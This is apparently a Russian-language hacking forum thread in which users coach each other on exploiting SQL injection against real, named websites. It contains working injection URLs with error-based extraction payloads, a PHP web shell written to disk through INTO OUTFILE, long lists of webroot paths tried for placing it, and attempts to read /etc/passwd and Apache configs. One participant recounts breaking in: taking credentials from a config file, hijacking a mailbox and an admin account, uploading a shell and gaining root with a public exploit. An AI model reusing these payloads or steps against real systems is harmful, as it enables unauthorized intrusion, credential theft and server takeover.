Aniweste, всё нормально. fro воспринимается как псевдоним для колонки, запрос корректен. В случае с from в запрос из-за фильтра поступает муть и вы видите ошибку.
Помогите разобраться, там Joomla. http://k apper-sng.ru/insiderskaya-informaciya?start=4 пытаюсь раскрутить переменную start, но видимо мало еще понимаю механизм. при запросе start=-4 пытаюсь подобрать столбцы, но не получается, не пропадает ошибка. при start=99999 выдаётся пустая страница, без содержания. Вроде и есть инъекция (на сколько моих знаний хватает), но не могу понять, как использовать. Покажите правильную дорогу пожалуйста. Благодарю заранее.
Здесь нечего крутить, к лимиту допускаются только целые числа, здесь в любом случае нет даже вариантов к раскрутке.
А что вы там крутите то ? Тут так-же, как с предыдущим сайтом. Там есть более доступные варианты: Code: http://cyberfight.ru/site/polls/?topic_id=430&answer_id=(select max(0)from information_schema.schemata group by concat(0x427920496E6F6D7321,0x3b,user(),hex(rand(0))))
Вопрос, наверное, тупой и т.д., но всё-таки: При выводе через SQL-injection данных из information_schema.schemata schema_name мы получим базы данных к которым имеет доступ данный пользователь? Или вообще ко всем базам данных? Соответственно, если ответом на мой вопрос является - ко всем базам данных, к которым имеет доступ пользователь, то у меня второй вопрос: Если среди этих баз есть mysql, то можно ли узнать file_priv через mysql.user (спрашиваю, т.к. в моём случае выбивает ошибку)? Т.е. через information_schema.schemata schema_name получили данные из base1, information_shema и mysql , но прочитать можем только первые 2. Вот
Если в information_schema фигурирует mysql, но чтение с неё не производит - доступ к данной бд урезан для текущего пользователя, попросту говоря, запрещён. Соответственно, чтобы прочитать колонки с этой БД, тебе нужны права на выборку (селекцию). Если прав нет - чтение произвести ты не сможешь.
Aniweste, Все права можно посмотреть в information_schema.TABLE_PRIVILEGES, information_schema.COLUMN_PRIVILEGES, information_schema.SCHEMA_PRIVILEGES и information_schema.USER_PRIVILEGES.
Ещё один вопрос. Сайт - site.com File_priv - Y Вывод /etc/passwd под пользователя user() web - /home/web Вывод /etc/httpd/conf/httpd.conf - DocumentRoot "/var/www/html" Проверка заливки <?php system($_REQUEST[c]); ?> в '/tmp/test.txt' и вывод через load_file('tmp/test.txt')- 1,2,3,4,5,6,7,8,9,10,12 Пытался заливать в: Code: /home/www/data/www/1.txt /home/www/data/1.txt /home/www/data/www/site.com/1.txt /home/www/data/www/site/1.txt /home/www/1.txt /home/www/sites/site.com/htdocs/1.txt /home/www/sites/sitecom/htdocs/1.txt /home/www/sites/site/htdocs/1.txt /home/www/sites/site.com/httpdocs/1.txt /home/www/sites/sitecom/httpdocs/1.txt /home/www/sites/site/httpdocs/1.txt /home/www/sites/sitecom/httdocs/1.txt /home/www/site/site.com/htdocs/1.txt /home/www/site/sitecom/htdocs/1.txt /home/www/site/site/htdocs/1.txt /home/www/site/site.com/httpdocs/1.txt /home/www/site/sitecom/httpdocs/1.txt /home/www/site/site/httpdocs/1.txt /home/www/site/sitecom/httdocs/1.txt /home/web/data/www/1.txt/1.txt /home/web/data/1.txt /home/web/data/www/site.com/1.txt /home/web/data/www/site/1.txt /home/web/1.txt /home/web/sites/site.com/htdocs/1.txt /home/web/sites/sitecom/htdocs/1.txt /home/web/sites/site/htdocs/1.txt /home/web/sites/site.com/httpdocs/1.txt /home/web/sites/sitecom/httpdocs/1.txt /home/web/sites/site/httpdocs/1.txt /home/web/sites/sitecom/httdocs/1.txt /home/web/site/site.com/htdocs/1.txt /home/web/site/sitecom/htdocs/1.txt /home/web/site/site/htdocs/1.txt /home/web/site/site.com/httpdocs/1.txt /home/web/site/sitecom/httpdocs/1.txt /home/web/site/site/httpdocs/1.txt /home/web/site/sitecom/httdocs/1.txt /var/www/html/1.txt /var/www/web/1.txt /var/www/html/web/1.txt /var/www/html/site.com/1.txt /var/www/html/sitecom/1.txt /var/www/html/site/1.txt /var/www/html/web/site.com/1.txt /var/www/html/web/sitecom/1.txt /var/www/html/web/site/1.txt /var/www/web/data/www/site/1.txt /var/www/web/data/www/site.com/1.txt /var/www/web/data/www/sitecom/1.txt На результате это никак не сказалось. По сайту site.com/1.txt - 404 not found Пытался также перезаписать robots.txt - 404 not found И т.к. вывода с путём сайта я не нашёл ни так (при неверном запросе /var/wwwwwww/1.txt нету Errcode), не через google (искал вывод ошибки с этого сайта с раскрытием путей), а также пробовал через все вышеперечисленные варианты прочесть корневой robots.txt (через load_file), но как итог - нет результата. у меня 2 вопроса: 1. Возможно ли, что запись в корень не возможна и соответственно невозможно чтение из корня или же я просто не попал на правильные пути? 2. Второй вопрос вытекает из всего вышеперечисленного! Как ещё можно узнать полный путь до корня? P.s. вопрос с админкой отпадает - она переименована и её найти не смог. Как и директорию с phpmyadmin.
Просто интересно, нахрена, если Но ты обязательно продолжай и держи нас в курсе событий !! Есть ещё много интересных директорий ! Ответы: 1) Возможно. Правильный путь проверяется load_file любого существующего файла. 2) Напоролся не на тот конфиг Apache, вариант - старый конфиг.
Полный путь до корня можно узнать из конфига. Это не обязательно /etc/httpd/conf/httpd.conf. Этот конфиг как правило правят руками, на всяких шаредах разведен бардак в подключаемых конфигах. Аналогично, это зависит от демона. А также phpinfo и любой вывод ошибок. Скиньте вашу ссылочку в пм, поищем админку.
Я не дописал Тоже тестил: Code: /var/www/html/1.txt /var/www/html/site/1.txt /var/www/html/sitecom/1.txt /var/www/html/site.com/1.txt /var/www/html/web/site/1.txt /var/www/html/web/sitecom/1.txt /var/www/html/web/site.com/1.txt /var/www/html/web/1.txt И также пробовал подгружать существующий в корне robots Результат такой же. Странно, что сразу не дописал И нашёл php.ini в корне
Один и тот же: PHP: ERROR 1 (HY000): Can't create/write to file '/root/a' (Errcode: 13) Чтобы узнать правильность пути, пишите в каталог. Когда он существует, выводится такая ошибка: PHP: ERROR 1086 (HY000): File '/root' already exists Этот метод сработает, если двигаться от корня к конечной директории.
Как и просил BigBear, держу вас в курсе. Дело сдвинулось с мёртвой точки. Просматривал старые страницы сайта, какие они были 3 года назад и набрёл на форум. Его снесли, и перенесли в другую папку. Через час неудач - нашёл его по адресу site.com/forumdeleteadminforum )))))))) Но и тут возникла неудача - на форуме учётки были привязаны к учёткам на сайте, но на сайте уже совсем всё по другому и 8 из 9 учёток не подошли, как и 9. Но из конфига самого сайта удалось достать доступ к почтовому ящику вида [email protected] на который 9-ый аккаунт смог заретривить пароль. После чего удалось зайти в админку phpbb. Всё удалось. Меня вроде бы ждал успех, но: http://s019.radikal.ru/i630/1406/a3/8f27972b561f.jpg ..... Но потом я залился и получил рута через сплоит с рдота . Знаю текст был лишним, но может кому-нибудь пригодится и он не забросит сайт
int, Вашим способом лучше перебирать биты (8 запросов на символ, 7-5 при оптимизации). Есть векторы, основаны на других методах, но пока без полноценного софта: https://rdot.org/forum/showthread.php?t=2865
_ttp://www.anabolic-pharma.com/?action=nws-show&id=1+or+1=@@version читай мануал и крути: https://forum.antichat.ru/thread30501.html
